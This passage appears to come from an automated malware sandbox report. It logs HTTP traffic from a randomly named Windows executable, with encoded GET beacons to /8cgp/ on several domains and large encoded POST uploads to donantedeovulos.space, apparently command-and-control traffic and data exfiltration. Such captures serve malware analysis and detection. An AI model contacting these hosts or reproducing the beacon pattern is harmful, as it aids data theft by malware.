                                                                    Apr 24, 2024 12:31:24.246632099 CEST1829OUTData Raw: 71 35 32 72 50 68 57 48 6b 77 39 39 64 69 79 5a 78 68 79 6c 77 31 58 52 61 48 6c 38 2b 45 7a 52 2b 75 31 76 4d 51 4c 6f 33 79 54 34 4f 6c 56 37 47 35 79 71 7a 46 36 54 76 76 69 69 2f 2b 46 55 34 77 52 62 43 4c 6e 39 47 4a 4f 45 44 32 54 59 55 52
                                                                    Data Ascii: q52rPhWHkw99diyZxhylw1XRaHl8+EzR+u1vMQLo3yT4OlV7G5yqzF6Tvvii/+FU4wRbCLn9GJOED2TYUR6p14AHweIfjMIH3k5ddu8BrtgR96DpW3hXsTrV/wTkeMItJlbUA2UvoNNRsd0ZE/nMupBjn0mpZIyN4olCe7fgBuQWjuK4kC/HFszb9b/ciORMq4vH1mVdqw5lfACYFsxp0WFoT9l++wjJRrHQRiFv2K06ZYcXOGq


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    44192.168.11.2050289173.232.100.113807240C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Apr 24, 2024 12:31:26.600867033 CEST387OUTGET /8cgp/?Xh9lX=1MJjEON/uhpbuDEqbkHBFEkwk/hMmapOQ6TXfH8Ig3o6kyo9vDLLjAAJ58FhZwMWBw3WEeqXS0siPV8x1sARUVUsjrzf4e0UfFtBtuYJdiL+lQFlVX0tNTo=&QDnH=ERXP8 HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Host: www.whjzff.com
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Apr 24, 2024 12:31:26.765889883 CEST305INHTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Wed, 24 Apr 2024 10:31:26 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 162
                                                                    Connection: close
                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    45192.168.11.205029051.77.215.151807240C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Apr 24, 2024 12:31:35.125386953 CEST392OUTGET /8cgp/?QDnH=ERXP8&Xh9lX=Rt3kyQgIVYud0ZxfjVmkNGlq6oguJ3Bu0zZO/jPZwrZwphqha226ELu53C2wC06UMZB3RXlB5IubdFV8wNllBFtqfqdEgmnsNC5NpQzeW4FZZkQ+d4TAHSc= HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Host: www.arilyfarlico.ru
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Apr 24, 2024 12:31:35.428301096 CEST197INHTTP/1.1 200 OK
                                                                    Date: Wed, 24 Apr 2024 10:31:35 GMT
                                                                    Server: Apache
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Content-Length: 20
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Data Raw: 55 6e 6b 6e 6f 77 6e 20 72 65 71 75 65 73 74 20 74 79 70 65
                                                                    Data Ascii: Unknown request type


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    46192.168.11.205029164.190.62.22807240C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Apr 24, 2024 12:31:40.758810997 CEST686OUTPOST /8cgp/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 202
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: www.donantedeovulos.space
                                                                    Origin: http://www.donantedeovulos.space
                                                                    Referer: http://www.donantedeovulos.space/8cgp/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Data Raw: 58 68 39 6c 58 3d 35 70 6d 4c 4e 34 38 67 4b 72 45 66 36 4b 54 6e 48 47 66 31 4b 78 4f 59 6a 64 77 79 70 2b 53 63 65 51 37 4a 34 34 67 4c 41 6b 52 32 42 52 61 6a 33 5a 66 42 63 56 38 43 4b 56 45 46 6d 51 43 42 38 33 52 78 2f 6f 39 39 62 37 47 75 39 72 46 61 6b 67 6f 5a 55 4d 6d 4f 32 63 49 39 36 69 7a 39 36 41 64 2f 6e 55 53 61 59 5a 51 30 6e 38 70 66 6f 4b 57 49 48 50 2b 68 4d 4d 71 75 4f 78 6d 43 66 76 64 69 33 7a 2b 33 68 6e 6a 54 76 47 45 65 63 70 6f 79 69 30 4b 2b 44 59 72 51 51 57 6e 58 6a 6e 4f 48 30 4b 79 49 32 78 59 6c 42 7a 4e 4b 57 43 30 6c 71 68 4e 71 2b 78 4f 30 4c 50 39 71 34 67 3d 3d
                                                                    Data Ascii: Xh9lX=5pmLN48gKrEf6KTnHGf1KxOYjdwyp+SceQ7J44gLAkR2BRaj3ZfBcV8CKVEFmQCB83Rx/o99b7Gu9rFakgoZUMmO2cI96iz96Ad/nUSaYZQ0n8pfoKWIHP+hMMquOxmCfvdi3z+3hnjTvGEecpoyi0K+DYrQQWnXjnOH0KyI2xYlBzNKWC0lqhNq+xO0LP9q4g==
                                                                    Apr 24, 2024 12:31:41.069983959 CEST299INHTTP/1.1 405 Not Allowed
                                                                    date: Wed, 24 Apr 2024 10:31:40 GMT
                                                                    content-type: text/html
                                                                    content-length: 154
                                                                    server: NginX
                                                                    connection: close
                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    47192.168.11.205029264.190.62.22807240C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Apr 24, 2024 12:31:43.601685047 CEST1026OUTPOST /8cgp/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 542
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: www.donantedeovulos.space
                                                                    Origin: http://www.donantedeovulos.space
                                                                    Referer: http://www.donantedeovulos.space/8cgp/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Data Raw: 58 68 39 6c 58 3d 35 70 6d 4c 4e 34 38 67 4b 72 45 66 36 71 6a 6e 46 68 72 31 62 68 4f 62 73 39 77 79 6a 65 53 69 65 51 48 4a 34 38 35 54 44 52 68 32 47 7a 79 6a 32 59 66 42 51 31 38 43 66 6c 45 4d 6f 77 43 57 38 33 64 44 2f 74 46 39 62 37 53 75 38 59 4e 61 69 51 6f 57 63 73 6d 42 38 38 4a 36 2b 69 79 38 36 41 42 64 6e 56 32 61 59 70 73 30 67 2b 78 66 35 72 57 4c 43 76 2b 6e 64 73 71 76 42 52 6d 51 66 76 52 55 33 32 53 42 68 57 58 54 76 6c 38 65 53 4a 6f 31 34 30 4b 7a 63 49 71 43 61 7a 57 54 67 48 71 34 31 6f 43 75 2b 45 4d 4d 63 77 68 53 52 69 38 44 2b 78 6c 59 68 54 43 36 4b 63 34 41 73 65 62 53 47 49 48 2b 76 55 4d 4c 49 69 78 53 52 76 70 77 6c 2b 31 65 54 6f 76 66 75 4f 64 30 2b 6c 35 6a 4d 61 71 41 34 4a 4e 6a 4a 36 7a 46 76 46 32 4c 6a 64 70 59 7a 57 39 2b 41 48 49 75 33 56 55 55 77 5a 37 79 34 50 41 62 37 47 46 44 6d 64 36 4f 4f 77 70 71 67 4f 38 45 6e 46 32 30 46 41 72 2f 34 43 6c 2f 47 63 4d 65 59 35 72 44 38 46 6f 59 36 36 76 7a 30 75 30 75 2b 6b 71 6b 43 75 5a 34 31 50 75 47 56 38 74 43 44 74 77 70 2b 48 6d 39 63 75 56 71 51 48 70 42 6a 59 66 49 42 50 68 41 5a 58 41 44 31 36 45 30 32 67 39 58 7a 4f 76 6e 50 4e 72 47 4d 56 48 50 67 7a 79 62 6f 69 4f 4b 6b 69 4e 42 36 33 62 4a 67 59 67 30 43 65 44 42 36 43 56 4c 6e 57 35 74 72 4e 41 2f 64 5a 76 47 69 68 35 42 65 6c 6b 4b 4c 57 77 70 2b 49 68 66 79 4d 59 5a 77 41 43 73 5a 65 4f 77 53 6a 34 76 63 72 6d 6d 35 77 56 53 4f 59 4b 2b 61 4a 4c 62 2f 6b 62 7a 77 6f 56 6e 50 58 56 4d 62 30 48 73 44 4b 78 43 59 61 41 52 39 46 42 55 34 39 36 35 66 6f 53 4d 68 59 79 57 56 77 35 30 46 56 38 6c 53 73 4a 74 6e 6a 37 57 31 31 49 2b 5a 35 70 33 61 79 4d 3d
                                                                    Data Ascii: Xh9lX=5pmLN48gKrEf6qjnFhr1bhObs9wyjeSieQHJ485TDRh2Gzyj2YfBQ18CflEMowCW83dD/tF9b7Su8YNaiQoWcsmB88J6+iy86ABdnV2aYps0g+xf5rWLCv+ndsqvBRmQfvRU32SBhWXTvl8eSJo140KzcIqCazWTgHq41oCu+EMMcwhSRi8D+xlYhTC6Kc4AsebSGIH+vUMLIixSRvpwl+1eTovfuOd0+l5jMaqA4JNjJ6zFvF2LjdpYzW9+AHIu3VUUwZ7y4PAb7GFDmd6OOwpqgO8EnF20FAr/4Cl/GcMeY5rD8FoY66vz0u0u+kqkCuZ41PuGV8tCDtwp+Hm9cuVqQHpBjYfIBPhAZXAD16E02g9XzOvnPNrGMVHPgzyboiOKkiNB63bJgYg0CeDB6CVLnW5trNA/dZvGih5BelkKLWwp+IhfyMYZwACsZeOwSj4vcrmm5wVSOYK+aJLb/kbzwoVnPXVMb0HsDKxCYaAR9FBU4965foSMhYyWVw50FV8lSsJtnj7W11I+Z5p3ayM=
                                                                    Apr 24, 2024 12:31:43.912746906 CEST299INHTTP/1.1 405 Not Allowed
                                                                    date: Wed, 24 Apr 2024 10:31:43 GMT
                                                                    content-type: text/html
                                                                    content-length: 154
                                                                    server: NginX
                                                                    connection: close
                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    48192.168.11.205029364.190.62.22807240C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Apr 24, 2024 12:31:46.445893049 CEST2578OUTPOST /8cgp/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 52930
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: www.donantedeovulos.space
                                                                    Origin: http://www.donantedeovulos.space
                                                                    Referer: http://www.donantedeovulos.space/8cgp/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Data Raw: 58 68 39 6c 58 3d 35 70 6d 4c 4e 34 38 67 4b 72 45 66 36 71 6a 6e 46 68 72 31 62 68 4f 62 73 39 77 79 6a 65 53 69 65 51 48 4a 34 38 35 54 44 51 31 32 47 43 53 6a 32 37 33 42 52 31 38 43 44 31 45 4a 6f 77 43 75 38 33 46 48 2f 74 35 74 62 35 71 75 38 50 42 61 69 69 51 57 4b 38 6d 41 35 38 4a 72 36 69 79 67 36 41 64 33 6e 56 53 4b 59 5a 49 30 6e 39 5a 66 6f 73 36 49 4d 66 2b 68 64 73 72 67 51 42 6d 79 66 76 56 45 33 32 4f 42 68 54 66 54 39 6e 30 65 52 59 6f 31 73 55 4b 79 4b 34 71 52 55 6a 57 36 67 48 75 4b 31 6f 44 56 2b 42 73 4d 63 79 5a 53 51 67 55 45 77 78 6c 59 36 54 44 73 4f 63 6b 45 73 65 48 4b 47 49 44 2b 76 55 30 4c 61 79 78 53 61 74 52 7a 69 65 31 63 65 49 75 66 71 4f 51 37 2b 6b 5a 33 4d 65 36 41 34 34 70 6a 62 39 6e 46 74 6b 32 4c 74 64 70 61 75 47 38 69 4b 6e 4a 78 33 56 46 2f 77 5a 62 45 34 4d 4d 62 36 6e 4a 44 32 4d 36 4e 49 51 6f 68 2b 65 38 72 32 56 71 6f 46 41 37 64 34 43 6c 57 47 65 67 65 59 4b 7a 44 39 41 55 66 37 4b 76 77 68 2b 30 37 70 31 57 75 43 75 74 67 31 50 4b 57 56 2f 42 43 46 4e 77 70 37 6b 2b 2b 57 65 56 74 53 48 6f 47 74 34 65 58 42 50 39 32 5a 53 68 34 79 4c 6f 30 32 51 74 58 30 65 76 6d 66 39 72 4b 44 31 48 56 32 44 79 62 6f 69 43 65 6b 69 42 42 36 6d 6a 4a 67 76 45 30 41 4e 62 42 38 43 56 33 6e 57 34 72 72 4e 63 32 64 5a 6e 34 69 6c 38 75 65 67 30 4b 4c 48 67 70 39 4b 4a 63 30 38 59 57 30 41 43 64 47 75 4b 72 53 6a 4d 33 63 72 32 59 35 41 70 53 55 59 61 2b 65 4a 4c 59 39 45 62 30 7a 6f 56 78 4c 58 70 51 62 30 71 62 44 4c 45 4a 59 59 41 52 2f 51 6b 57 71 64 6d 62 4a 35 48 62 70 61 69 53 62 42 68 47 4c 47 45 4f 65 76 31 79 74 54 6d 47 35 58 41 2b 64 72 74 43 42 53 73 46 4f 61 45 79 56 72 4f 63 74 58 5a 32 62 67 58 4b 34 46 4e 4f 66 62 64 62 61 39 44 71 6b 68 57 65 64 34 56 72 43 54 4b 38 32 4d 63 43 33 61 39 37 34 4d 73 4e 6d 66 39 6e 74 39 64 49 46 47 74 34 6a 71 58 6a 68 39 72 34 66 2b 6a 4b 4c 58 33 55 30 47 30 61 6d 56 73 73 43 6b 6b 62 5a 4e 51 2f 6f 35 57 75 78 51 71 4a 36 6a 5a 67 33 2b 36 4d 41 53 50 68 71 55 65 48 4f 42 65 66 68 77 35 68 46 61 59 52 49 69 50 45 49 42 59 53 2b 42 6e 79 65 49 53 33 44 48 66 6f 75 63 64 68 58 79 4b 4b 69 4b 70 38 38 64 6a 37 4a 4b 38 41 76 69 52 2b 36 31 77 33 50 2f 79 4b 46 6a 2b 4d 48 5a 5a 6f 2b 79 43 69 36 6a 68 61 6c 46 37 75 5a 62 75 61 32 69 45 7a 32 78 6d 66 61 38 70 4a 43 6f 73 71 65 50 33 4f 2f 50 67 32 72 4e 51 51 38 35 78 77 6a 49 46 51 72 6a 75 58 2b 58 62 63 46 59 46 66 75 53 49 73 4e 51 6d 31 6a 49 36 61 35 5a 66 32 70 75 32 53 50 62 61 63 74 53 36 78 65 64 76 50 50 37 6d 79 46 30 52 35 66 56 41 49 55 6e 33 58 64 41 31 33 71 39 70 6c 44 6b 72 6b 58 75 47 6d 35 48 72 55 57 30 68 69 2f 55 4a 6d 72 52 55 69 4a 72 42 73 50 69 30 73 30 6f 53 64 61 6c 64 7a 71 6f 4e 6f 6b 2f 5a 31 6e 73 63 39 77 67 6b 4f 36 58 31 6d 6d 54 2b 42 52 7a 6e 6f 30 57 53 34 32 43 58 39 37 59 69 56 50 57 7a 6b 4a 73 63 54 68 72 31 79 58 31 4d 6f 38 74 62 6e 4e 38 47 33 75 4a 61 66 76 58 67 78 78 6d 65 45 37 4d 4d 6b 38 69 63 55 41 71 6c 6c 31 48 41 36 68 39 71 39 4e 4d 37 41 6a 79 4d 74 72 6f 4c 68 47 77 36 36 2f 34 4e 53 52 72 42 32 67 69 33 65 55 4c 4a 6a 72 6c 59 6e 4e 2f 2b 65 55 47 4e 4a 4d 4d 67 70 7a 68 65 55 67 37 65 51 37 4a 79 7a 37 62 61 57 58 32 44 42 42 64 66 58 32 44 38 57 65 47 6d 79 64 66 78 79 62 2b 77 32 62 6d 68 75 7a 70 51 73 53 55 79 74 68 71 79 69 73 2b 52 74 7a 79 54 66 4e 6b 6e 66 31 44 2f 6b 6a 73 74 32 37 34 70 69 56 54 33 78 4e 4e 2b 65 32 51 6d 6f 46 69 6e 67 61 41 76 76 62 35 78 36 55 73 77 4e 4c 4c 64 45 75 59 42 49 42 4e 61 34 4e 61 62 6f 31 53 75 73 32 42 66 76 6d 53 7a 31 58 30 6e 52 2f 4f 62 79 43 2b 4c 6b 78 4b 45 46 4f 79 47 46 57 68 77 50 76 4f 34 69 58 59 49 69 4e 36 6d 6a 78 56 53 48 71 55 6e 78 63 32 4a 62 76 39 43 57 64 68 72 54 42 53 6c 4f 4e 72 66 79 30 46 77 35 44 47 7a 39 77 53 61 67 74 7a 69 44 4d 75 75 44 49 64 2b 53 62 70 6b 4b 6d 62 32 68 33 75 53 48 74 6a 44 4b 54 76 74 68 39 49 5a 59 65 74 59 42 38 30 7a 64 69 30 75 4c 62 77 41 45 38 44 50 34 51 41 73 2f 4d 46 65 75 42 6b 62 70 4d 4c 66 56 32 63 55 6e 37 75 69 62 47 52 6f 66 79 51 6c 49 6d 67 46 4b 6d 36 78 6c 35 79 36 4f 44 75 32 56 70 67 4f 69 38 2f 4b 55 61
                                                                    Data Ascii: Xh9lX=5pmLN48gKrEf6qjnFhr1bhObs9wyjeSieQHJ485TDQ12GCSj273BR18CD1EJowCu83FH/t5tb5qu8PBaiiQWK8mA58Jr6iyg6Ad3nVSKYZI0n9Zfos6IMf+hdsrgQBmyfvVE32OBhTfT9n0eRYo1sUKyK4qRUjW6gHuK1oDV+BsMcyZSQgUEwxlY6TDsOckEseHKGID+vU0LayxSatRzie1ceIufqOQ7+kZ3Me6A44pjb9nFtk2LtdpauG8iKnJx3VF/wZbE4MMb6nJD2M6NIQoh+e8r2VqoFA7d4ClWGegeYKzD9AUf7Kvwh+07p1WuCutg1PKWV/BCFNwp7k++WeVtSHoGt4eXBP92ZSh4yLo02QtX0evmf9rKD1HV2DyboiCekiBB6mjJgvE0ANbB8CV3nW4rrNc2dZn4il8ueg0KLHgp9KJc08YW0ACdGuKrSjM3cr2Y5ApSUYa+eJLY9Eb0zoVxLXpQb0qbDLEJYYAR/QkWqdmbJ5HbpaiSbBhGLGEOev1ytTmG5XA+drtCBSsFOaEyVrOctXZ2bgXK4FNOfbdba9DqkhWed4VrCTK82McC3a974MsNmf9nt9dIFGt4jqXjh9r4f+jKLX3U0G0amVssCkkbZNQ/o5WuxQqJ6jZg3+6MASPhqUeHOBefhw5hFaYRIiPEIBYS+BnyeIS3DHfoucdhXyKKiKp88dj7JK8AviR+61w3P/yKFj+MHZZo+yCi6jhalF7uZbua2iEz2xmfa8pJCosqeP3O/Pg2rNQQ85xwjIFQrjuX+XbcFYFfuSIsNQm1jI6a5Zf2pu2SPbactS6xedvPP7myF0R5fVAIUn3XdA13q9plDkrkXuGm5HrUW0hi/UJmrRUiJrBsPi0s0oSdaldzqoNok/Z1nsc9wgkO6X1mmT+BRzno0WS42CX97YiVPWzkJscThr1yX1Mo8tbnN8G3uJafvXgxxmeE7MMk8icUAqll1HA6h9q9NM7AjyMtroLhGw66/4NSRrB2gi3eULJjrlYnN/+eUGNJMMgpzheUg7eQ7Jyz7baWX2DBBdfX2D8WeGmydfxyb+w2bmhuzpQsSUythqyis+RtzyTfNknf1D/kjst274piVT3xNN+e2QmoFingaAvvb5x6UswNLLdEuYBIBNa4Nabo1Sus2BfvmSz1X0nR/ObyC+LkxKEFOyGFWhwPvO4iXYIiN6mjxVSHqUnxc2Jbv9CWdhrTBSlONrfy0Fw5DGz9wSagtziDMuuDId+SbpkKmb2h3uSHtjDKTvth9IZYetYB80zdi0uLbwAE8DP4QAs/MFeuBkbpMLfV2cUn7uibGRofyQlImgFKm6xl5y6ODu2VpgOi8/KUaBDjF54/oPbJj9efUMlsZ8nOQh2pa1F0yKsaBduziWpzGpnFINvQK7+AfEjVcwnKkJEfDg9J/J2qKm8iel2KoL5bUq0rIKfqR3H6BZHA7WnWdmWjfoAQgLdVoBKdUen98g5KFvSxqC5tqDW5Wt8+wS1EIzzYTijCJKlafBBpjfFKWwZUJhrHEHEqzJUHNovNUGR7Y2XaE4bv3BDZPZC90g+2XKwA97JZ5B6zdy474WuieL/SKkfloTAlBKe7YwWkS5JJE+OXtx+xUUBLknu04wtVPAJLNUYwZ2lym4Aog6yyWUcPnFQPrOawLO6XYdciG8AF9Z3mAAdjqzUMmM9Ec0E/Wy1sAuKycCeM0/xr3HRErXeKJyQVnovcY5r6I9NmCWQfRpjyGYGxNNY4zZDPv5FoEy1l8mUNUXHHI9vCiRBjyP+l/BSFh/WH14ud5PFLlDwMBerNoQwloDwLGvL4xdIFauaMCn5cYXC8TBCYt/Wh1Wg0KzDqVjS5A9RM3UxDcQjsBSntEC3SLDoWoBzy7ur6yG1Smhz4DeAUN60g0NGiGac/Pio0Evnq8mNAl8+gLzRrneQQ6hthCnsn5/IM2+bEXGD8myDg9zHgELVxeifdfpAgTOPxhPNimd7kBWDikAZwAEdt4pSYTqe2l8X4CCWp6nd44lXh6AILS2EkhVpmlKfnN2jmDExBwcZql5ekJ9jamzW+FGKcyPChJM+GDDXWC3
                                                                    Apr 24, 2024 12:31:46.445915937 CEST5156OUTData Raw: 61 5a 69 35 35 6e 54 74 38 37 65 43 5a 67 6a 79 32 69 46 31 79 4f 64 41 70 68 39 54 78 37 64 66 56 34 66 56 6f 70 6e 41 55 70 44 41 4a 4d 2b 37 56 2b 54 6d 4e 4c 38 43 63 41 70 30 2f 4d 71 4b 66 70 65 72 73 2f 70 6e 78 35 44 54 6e 68 62 59 61 30
                                                                    Data Ascii: aZi55nTt87eCZgjy2iF1yOdAph9Tx7dfV4fVopnAUpDAJM+7V+TmNL8CcAp0/MqKfpers/pnx5DTnhbYa0xsqQhRsHzys9PBOWK01+iCkWOiB1kFpp5uVrMEbnkbqxlk/khDR2AjoqUNVt6MJXQGbsMIpQcnJszDE/V3GoVTuTEG+7V0YL+pw89yx6vidjvlXlz2KFvyxc/JNPZ6kZBFyI9w75qc1orp9/K3ISvCXXSzNP3HBdK
                                                                    Apr 24, 2024 12:31:46.445993900 CEST5156OUTData Raw: 50 61 37 71 70 4f 52 4d 49 2f 57 45 4b 78 74 74 75 6a 64 4b 58 72 63 53 79 36 30 71 47 39 73 69 37 68 63 70 62 4a 38 48 55 71 61 68 6d 33 6f 78 6d 6e 4c 36 2f 36 30 69 48 31 67 5a 52 4f 69 58 2f 78 46 50 63 43 55 78 49 42 69 78 52 65 6a 43 39 57
                                                                    Data Ascii: Pa7qpORMI/WEKxttujdKXrcSy60qG9si7hcpbJ8HUqahm3oxmnL6/60iH1gZROiX/xFPcCUxIBixRejC9WeN4dXhKd5XFKa1GiczUK84RFdK+jt4rDiKUbCZlsrFGROqJxokSqD9FkVpv3CNGtLFR4bkj8Sw6qZY9/JaOhjDHYWA+d2yRe0NQqiP9x7OYpMMknBqpRVwQfRMyvr6SUU5hjyxUQ2qmqhpCvv7U2Y7MCJXLPFjcXg
                                                                    Apr 24, 2024 12:31:46.756297112 CEST2578OUTData Raw: 59 71 30 74 74 2f 74 42 33 47 55 49 7a 76 7a 37 51 35 46 4f 49 7a 59 63 34 74 61 6e 39 6f 6e 69 32 69 41 38 64 39 52 43 55 43 49 71 4c 4c 55 34 44 47 39 52 32 53 30 73 76 5a 68 67 70 52 49 4b 2f 78 47 59 6f 61 67 33 46 38 73 47 4d 4a 61 73 47 43
                                                                    Data Ascii: Yq0tt/tB3GUIzvz7Q5FOIzYc4tan9oni2iA8d9RCUCIqLLU4DG9R2S0svZhgpRIK/xGYoag3F8sGMJasGCcOHRug9iLM/HjMszNPd7L+NxlwOpMv/f0bBo+/ShQiTsxFagG1nps3TG4FgQWdaY/KYGBgPVhIAjLeepJvpMu8HP2GiJMZqTfnjOk8860zWyoYYf4ARRjy5JAkug8lRehSO0KQukTvZDlb3+oC4rUvmY6ff/rmKAV
                                                                    Apr 24, 2024 12:31:46.756470919 CEST12890OUTData Raw: 36 4e 47 31 73 49 73 52 5a 31 45 59 50 5a 78 75 41 6b 72 47 52 78 41 38 50 32 6f 71 50 75 4e 64 61 76 4f 4d 50 77 4d 36 4f 72 72 45 6c 63 4d 6d 72 74 31 6e 49 4e 35 38 72 4c 4b 72 64 56 5a 4c 37 6d 53 6c 63 62 37 53 59 41 48 6e 4e 47 56 30 2f 48
                                                                    Data Ascii: 6NG1sIsRZ1EYPZxuAkrGRxA8P2oqPuNdavOMPwM6OrrElcMmrt1nIN58rLKrdVZL7mSlcb7SYAHnNGV0/H3qp4ic9vjTzBLNwQve95GeRBuEPeEvzPXg2odwSF+/WTxbUiGLt2UPwizQS0SijFRH3cd372dhOtYaSClKw9rhXJ11mALhD3XvMXkNJZ3rojaRY0kIWN7HtOC1PNhb/JZMmfbsqTXNuGvlXMqzc6gqXHp18bbh5fQ
                                                                    Apr 24, 2024 12:31:46.756639957 CEST5156OUTData Raw: 77 45 75 59 57 78 77 74 49 52 47 42 52 35 6b 2f 79 73 71 56 64 6b 35 50 34 75 55 34 48 77 6c 38 52 7a 69 46 72 34 6f 47 63 4f 49 30 78 69 41 5a 2b 68 48 58 42 64 2f 4a 73 36 56 6a 74 68 6b 73 6e 62 6d 4a 71 53 64 72 4d 52 2f 39 6e 51 75 2f 72 6e
                                                                    Data Ascii: wEuYWxwtIRGBR5k/ysqVdk5P4uU4Hwl8RziFr4oGcOI0xiAZ+hHXBd/Js6VjthksnbmJqSdrMR/9nQu/rndyD2Oo1Dt2ginvEesH+jS+SM30z5TSujUfjA4xyC/L7mINSlDnRetsUM04UkHyGm+3Hyk1Tt6avLJcGDM7MajD+pjDt2d1zvDNwvqekVxCF4MXWjDSKDvgfJmf+NAQwJSubR+Jfzx6Rv3uF+d0KpCVbn9Ur7WrM/G
